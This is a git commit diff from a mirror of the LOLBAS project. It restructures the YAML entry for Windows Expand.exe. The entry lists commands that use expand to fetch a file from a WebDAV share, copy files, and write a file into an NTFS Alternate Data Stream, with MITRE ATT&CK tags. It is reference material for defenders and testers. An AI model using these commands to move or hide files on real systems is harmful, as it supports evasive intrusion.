public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Changed all OSBinaries according to the new template

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-24 21:59:43 +02:00
parent 68884a4c13
commit 37cc1ee83e
66 changed files with 1448 additions and 698 deletions
Download Patch File Download Diff File Expand all files Collapse all files

51
yml/OSBinaries/Expand.yml
View File

@@ -1,23 +1,46 @@
---
Name: Expand.exe
Description: Download, Copy, Add ADS
Author: ''
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: 'Copies source file to destination.'
Description: Copies source file to destination.
Usecase: Use to copies the source file to the destination file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
Description: 'Copies source file to destination.'
Description: Copies source file to destination.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\Expand.exe
- c:\windows\sysWOW64\Expand.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/infosecn1nja/status/986628482858807297
- https://twitter.com/Oddvarmoe/status/986709068759949319
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
Acknowledgement:
- Person: Rahmat Nurfauzi
Handle: '@infosecn1nja'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---